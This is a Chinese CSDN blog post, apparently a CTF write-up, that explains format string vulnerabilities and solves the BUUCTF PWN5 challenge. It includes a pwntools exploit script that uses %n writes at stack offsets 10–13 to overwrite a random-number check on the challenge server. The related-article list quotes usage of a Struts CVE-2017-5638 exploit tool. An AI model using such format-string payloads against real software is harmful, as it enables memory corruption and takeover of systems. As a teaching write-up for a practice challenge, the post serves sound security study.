pwn-格式化字符串漏洞

最新推荐文章于 2024-05-24 21:48:03 发布
最新推荐文章于 2024-05-24 21:48:03 发布
阅读量887 收藏 3
点赞数
分类专栏: # PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/108449135
版权

一直想写一篇关于这个漏洞的博客,刚好借着今天刷到buu的【第五空间决赛2019】PWN5这道题来系统讲一下格式化字符串漏洞:
(这里这道题还是蛮简单的,主要是去理解这个漏洞的原理,关于该漏洞的难度稍大的题会零开博客讲解)

看一下几个经常用来测试格式化字符串的格式控制符
%d 用于读取10进制数值
%x 用于读取16进制数值 
(这两个都可以起到泄露信息的作用)
%s 用于读取字符串值  即泄露任意地址信息
(%d,%x只能泄露原有栈的内容,结合%s就可以泄露任意地址的内容)
(%s不直接打印栈中内容,而是通过栈中指针寻址,再打印)
%n用于把前面已经打印的长度写入某个内存地址
(把栈的地址当作指针,向它指向的地址写)

PWN5

我们输入一个比较长的字符可以发现它的输出回显稍微有点问题,所以大致推断溢出出在输出函数上。
然后向下找程序就会发现在第21行出现了我们讲到的——格式化字符串漏洞

首先我们先输入AAAA %08x %08x %8x %08x %08x %08x %08x %08X %08X %08X,发现输出的是

也就是说我们输入的AAAA——十六进制是41414141出现在了栈的第十个位置上

程序逻辑就是只要我们输入的等于系统产生的随机数,查看随机数的参数在函数里的地址,发现是4个字节:

那么我们可以分别用%(10~13)$去定位到这4个地址在% $后面+n,来修改这这个地址里的内容,exp如下:

from pwn import*

r=remote('node3.buuoj.cn',25544)

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+='%10$n%11$n%12$n%13$n'

r.sendline(payload)
# 0x10101010  4 * len(p32()) = 0x10
r.sendline(str(0x10101010))

r.interactive()

 

43v3rY0unG
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
格式化字符串漏洞
HBohan的博客
10-06 1994
漏洞原理 格式化字符串是一种很常见的漏洞,其产生根源是printf函数设计的缺陷,即printf()函数并不能确定数据参数arg1,arg2…究竟在什么地方结束,也就是说,它不知道参数的个数。它只会根据format中的打印格式的数目依次打印堆栈中参数format后面地址的内容 格式字符串漏洞发生的条件就是格式字符串要求的参数和实际提供的参数不匹配。 如图所示,执行的命令为printf("%s %d %d %d %x\n",buf, 1, 2, 3),紧随格式化字串后压入栈上的参数为4个,但格式化字串有五个.
菜鸟PWN手进阶之格式化字符串
re1wn
01-05 6483
菜鸟PWN手进阶之格式化字符串
栈上的格式化字符串漏洞【超详细,七种利用】(pwn入门)
最新发布
2402_83422357的博客
05-24 1083
格式化字符串漏洞由于目前编译器的默认禁止敏感格式控制符,而且容易通过代码审计中发现,所以此类漏洞现在已经极少出现了。所以格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。格式化字符串漏洞最早被Tymm Twillman在1999年发现,当时并未引起重视。
软件安全概述
AudreyQCb的博客
09-26 8735
一、软件安全 1、软件安全关注的是计算机程序或程序中信息的完整性、机密性和可用性 2、软件的安全缺陷: 1)软件自身的缺陷,设计者故意或过失 2)软件漏洞是基本的形态,而恶意代码是延伸的形体 3)软件中的客观存在 3、风险与安全事件 风险:软件内在的漏洞暴露在外在的威胁时称为风险 安全事件:软件内在的缺陷遭遇到威胁时为安全事件 4、软件安全范围 软件生命周期:软件设计阶段、软件编码测试阶段、软件运...
信息系统安全导论第六章之软件安全
JieBao11的博客
03-10 2496
武大信息系统安全导论(王鹃)学习记录
软件安全期末总结
夏日 の blog
07-05 6169
软件自身安全(软件缺陷与漏洞)、恶意软件攻击与检测、软件逆向分析(软件破解)与防护按漏洞可能对系统造成的直接威胁划分获取访问权限漏洞、权限提升漏洞、拒绝服务攻击漏洞、恶意软件植入漏洞、数据丢失或泄露漏洞等按漏洞的成因划分输入验证错误、访问验证错误、竞争条件错误、意外情况处理错误、设计错误、配置错误、环境错误等按漏洞的严重等级划分可分为高、中、低三个级别远程和本地管理员对应为高,普通用户权限、权限提升、读取受限文件远程和本地拒绝服务对应为中,远程非授权文件存取、口令恢复、欺骗。
Pwn 学习 格式化字符串
MrTreebook的博客
08-19 1455
每一种 pattern 的含义请具体参考维基百科的格式化字符串。以下几个 pattern 中的对应选择需要重点关注。可以看到%10p的作用是直接打印第十个%p位置上的指针内容。通过格式化字符串可以无限泄露栈上的数据。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
软件安全测试方法
datuzijean的博客
01-25 1万+
WEB攻击方法: 跨站脚本攻击、SQL注入、OS注入、http首部注入、http相应拦截攻击、邮件首部攻击、目录遍历攻击、远程文件包漏洞、会话劫持、会话固定、跨站点请求伪造、密码破解、DOS攻击。 渗透测试: 渗透测试是一种合法且授权定位计算机系统,并对其成功实施漏洞攻击的方法,其目的为了使这些受测系统更加安全。测试过程包括漏洞探测和提供概念证明攻击,以证明漏洞确实存在。渗透测试也称为黑客活...
[PWN]——格式化字符串漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 1983
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
11种方法判断​软件的安全可靠性​
2301_78843735的博客
02-08 557
软件的安全可靠性是衡量软件好坏的一个重要标准,安全性指与防止对程序及数据的非授权的故意或意外访问的能力有关的软件属性,可靠性指与在规定的一段时间和条件下,软件能维持其性能水平能力有关的一组属性。软件的安全可靠性是衡量软件好坏的一个重要标准,安全性指与防止对程序及数据的非授权的故意或意外访问的能力有关的软件属性,可靠性指与在规定的一段时间和条件下,软件。软件是否按功能模块划分用户权限,权限划分是否合理,考察超级用户对各个用户的权限管理是否合理,包括修改用户的登录资料等。3.系统对用户错误登录的次数限制。
信息安全基础练习题(看完包过)
热门推荐
zhuoxoyu
06-20 1万+
信息安全基础课程练习与参考解答 一、单项选择题 密码学的目的是( C )。 A. 研究数据加密 B. 研究数据解密 C. 研究数据保密 D. 研究漏洞扫描 数据机密性安全服务的基础是( D )。 A. 数据完整性机制 B. 数字签名机制 C. 访问控制机制 D. 加密机制 数字签名要预先使用单向Hash函数进行处理的原因是( C )。 A. 多一道加密工序使密文更难破译 B. 提高密文的计算速度 C. 缩小签名密文的长度,加快数字签名和验证签名的运算速度
【信息安全案例】——系统软件安全(学习笔记)
HinsCoder的博客
04-30 2390
操作系统是管理系统资源、控制程序执行、提供良好人机界面和各种服务的一种系统软件,是连接计算机硬件与上层软件和用户之间的桥梁。因此,操作系统是其他系统软件、应用软件运行的基础,操作系统的安全性对于保障其他系统软件和应用软件的安全至关重要。系统软件除了操作系统,数据库系统也是很重要的一类。数据库系统作为信息系统的核心和运行支撑环境,数据库中存储的信息的价值也越来越高,因而数据库的安全也显得越发重要。为此,本期围绕操作系统和数据库系统两大系统软件面临的安全问题和安全机制设计展开,也涉及了操作系统安全等级评估等内容
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值